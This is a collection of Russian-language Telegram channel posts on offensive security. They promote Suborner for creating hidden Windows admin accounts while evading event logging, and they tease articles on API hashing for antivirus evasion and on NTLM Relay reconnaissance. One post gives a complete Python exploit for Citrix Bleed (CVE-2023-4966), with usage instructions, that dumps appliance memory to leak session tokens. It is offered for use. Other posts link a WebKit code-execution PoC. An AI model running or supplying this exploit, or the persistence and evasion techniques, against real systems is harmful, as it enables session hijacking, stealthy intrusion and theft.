⚡️ Создаём "невидимые" аккаунты на Windows с помощью Suborner
#windows #redteam

Главные функции:
1️⃣ Создавайте невидимые локальные учетные записи без использования команды net user или user management приложений Windows (например, netapi32::netuseradd).

2️⃣ Подходит для всех машин Windows NT (от Windows XP до 11, от Windows Server 2003 до 2022).

3️⃣ Осуществляйте подмену идентификатора путем использования техники RID Hijacking для любой существующей учетной записи (активной или отключенной) после успешной аутентификации.

4️⃣ Создавайте невидимую учетную запись компьютера с административными привилегиями, обходя Event Logger Windows, который фиксирует создание учетной записи!

💻 Github repo

🌚 @poxek

👋 Вот это хорошо //

В бета-версии 4.10.4 Beta приложения Telegram Desktop у администраторов появилась возможность работать со статистикой каналов и групп.

Добавлены и другие важные нововведения:

— Например, можно быстро менять настройки пересылки по нажатию правой кнопки мыши на панель над полем ввода.

— Теперь есть визуально красивые блоки с кодом с подсветкой синтаксиса, их можно копировать по щелчку на заголовки блоков.

— Блок с моноширинным текстом и с подсветкой кода на выбранном языке программирования можно копировать при помощи синтаксиса ```language.

— Сочетание клавиш Ctrl+Space позволяет открывать меню проверки орфографии.

@d_code

🦠 Веселые хеши. Реализуем технику API Hashing, чтобы обдурить антивирус
#AVbypass #xakep

В этой статье мы с тобой напишем пол­ноцен­ную пер­мутиру­ющую реали­зацию тех­ники API Hashing, что поз­волит раз и нав­сегда скрыть импорты от глаз анти­виру­са. Впер­вые тех­нику API Hashing я уви­дел в вирусе‑шиф­роваль­щике Revil, проб­лема лишь в том, что хеши от фун­кций были впи­саны в код, а это поз­воля­ет лег­ко соз­давать сиг­натуры. Давай сде­лаем так, что­бы все дан­ные генери­рова­лись на лету, тог­да у анти­виру­са не будет шан­сов!

➡️ Статья на Xakep

🌚 @poxek

😉 BloodHound. Натаскиваем ищейку на поиск NTLM Relay
#bloodhound #xakep

Преж­де чем при­менять тех­нику NTLM Relay, необ­ходимо соб­рать информа­цию об иссле­дуемом объ­екте и выб­рать пер­вооче­ред­ные цели. Но как это сде­лать, если ата­куемая сеть нас­читыва­ет мно­гие десят­ки или сот­ни узлов? На помощь при­дет очень полез­ный и удоб­ный инс­тру­мент — BloodHound!

➡️ Статья на Xakep

🌚 @poxek

Эксплойт для Citrix Bleed: Leaking Session Tokens
CVE-2023-4966

Пользуйтесь на здоровье 😉
Exploit:

#!/usr/bin/env python3

import sys
import requests
import urllib3
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

parser = argparse.ArgumentParser()
parser.add_argument('--target', help='The Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)')
args = parser.parse_args()

if args.target is None:
    print('Target must be provided (e.g. --target 192.168.1.200)')
    sys.exit(0)

hostname = args.target

if __name__ == "__main__":
    headers = {
        "Host": "a"*24576
    }
    r = requests.get(f"https://{hostname}/oauth/idp/.well-known/openid-configuration", headers=headers, verify=False,timeout=10)
    if r.status_code == 200:
        print("--- Dumped Memory ---")
        print(r.text[131050:])
        print("---      End      ---")
    else:
        print("Could not dump memory")

Использование:

python exploit.py --target TARGET

💻 Github

➡️ Исследование

📹 YouTube PoC

🌚 @poxek

🐧 Microsoft отказывается от NTLM в пользу Kerberos

Компания Microsoft анонсировала, что в будущем NTLM (New Technology LAN Manager) будет отключен в Windows 11, поскольку компания переходит на альтернативные методы аутентификации и повышения безопасности. Теперь основной упор будет сделан на усиление протокола Kerberos.

➡️ Новость на Xakep

🌚 @poxek

💊 Регистрация на Standoff 101 от Positive Technologies
Мероприятие для тех, кто хочет попасть в кибербез, но не знает, с чего начать

📌 Даты: 18–19 ноября

🌚 @poxek

😵 Регистрация на Standoff Talks от Positive Technologies
Место для общения и обмена опытом профи и энтузиастов ИБ

📌 Даты: 24-25 ноября

🌚 @poxek

🍏 Эксплойт для CVE-2023-41993
Apple WebKit Arbitrary Code Execution

Затронутые версии: WebKitGTK и WPE WebKit до версии 2.42.1.
Импакт: Обработка веб-контента может привести к выполнению произвольного кода.

⚡️ Ссылка на PoC
Переходите по ссылке, только если вы уверены, что ваше яблочное устройство обновлено до последней версии или у вас Android.

1️⃣ Ссылка на эксплойт с объяснением принципа его эксплуатации

2️⃣ Бекап репозиторий

🌚 @poxek

Как провести свое первое security-исследование. Колонка Дениса Макрушина

На­чало учеб­ного года — это еще и начало сезона под­готов­ки дип­ломных работ. А это зна­чит, что у меня нас­тупа­ет сезон фор­мулиро­вания тем для сту­ден­тов факуль­тетов и кафедр информа­цион­ной безопас­ности в ведущих вузах. Я соб­рал свои рекомен­дации и лай­фха­ки для под­готов­ки тво­его пер­вого ИБ‑иссле­дова­ния.

От себя добавлю, что материал подойдёт всем, кто планирует или уже делает доклад/исследование на какую-то тему, не обязательно ИБ. В статье говориться про сам подход к ресерчам.
Отмечу сайт cfptime.org , где вы сможете отслеживать мировые конференции по ИБ, на которые вы сможете подавать на CFP (Call Of Papers).
А также ict2go для поиска мероприятий по различным направлениям и формату в России.

➡️ Статья на Xakep

🌚 @poxek